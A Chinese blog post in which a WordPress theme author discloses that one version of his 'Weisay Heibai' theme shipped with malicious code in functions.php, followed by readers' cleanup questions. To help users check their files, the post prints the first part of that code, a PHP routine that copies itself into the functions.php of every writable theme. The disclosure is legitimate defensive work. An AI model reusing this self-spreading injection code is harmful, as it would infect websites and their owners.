今天朋友说我的主题(『Weisay Heibai』无缓存头像版)中的functions.php被插入了恶意代码,我感到非常的震惊,赶紧下载打开查证,果然发现了恶意代码,现在我已经删掉了此段恶意代码,主题包也已经更新过了,请下载使用过的朋友赶紧删除主题文件夹下面的functions.php,重新下载我新上传主题包中的functions.php。
这段代码会感染主题文件夹下的其他主题,可能会把这段代码复制到其他主题的functions.php下面,所以很抱歉,大家要修正不仅仅是『Weisay Heibai』无缓存头像版,还有你主题文件夹下的其他主题,请使用的朋友特别注意检查下,看有没有问题,我深感抱歉。
WordPress黑白主题『Weisay Heibai』我发布2个版本,『Weisay Heibai』无缓存头像版 是我后来发布的版本,开始使用的人可能不知道,『Weisay Heibai』缓存头像版是没有问题的,只有『Weisay Heibai』无缓存头像版 有问题。
前几天帮人家修改了主题,可能导致这个问题的发生,开始我也不知道竟然还有这个东东,感谢zwwooooo的提醒。
希望用过我主题的朋友,都检查下主题的functions.php,看看其中有没有类似这段,这段恶意代码很长,我截取前面一段。
function _verifyactivate_widgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? "..." : "";
}
}
}
}
我主题正常的functions.php在
add_filter('the_content', 'password_hint');
//全部设置结束
?>
之后就结束了,后面还有其他代码的话就说明有问题了。
希望使用我主题的朋友都检查下,再次深感抱歉,以后我会严格检查我的主题的。
本文固定链接: https://www.weisay.com/blog/weisay-heibai-no-gravatar-cache-update.html | 威言威语
任侠:
挨踢小茶:
Lvtu:
huhen.com:
源码分享网:
布衣加针:
逝魂:
金风飒飒:
阿哲:
现在都是移动app
贾旭:
表示我中了,删不掉,一直感染其他主题,后来还是删除了
只传functions.php行吗
可能其他主题会被感染,只修改一个不一定确保所以的都正常,你可以先试试。
其他主题已经悲剧了,都改了,只改这个文件有用吗,会不会还有哪儿有
貌似只会感染functions.php。你删除每个主题的functions.php里面的感染代码应该也可以。
谢啦。我也不知道这个代码是哪来的。
lz问下,我把后面那段直接删了,行不?还有我是今天刚下载的黑白,还是有这段代码。
刚刚又下载看了下,是正常的,建议你删掉主题文件夹里面的全部主题,然后重新上传主题。
好狠,要全删。。我改了很多了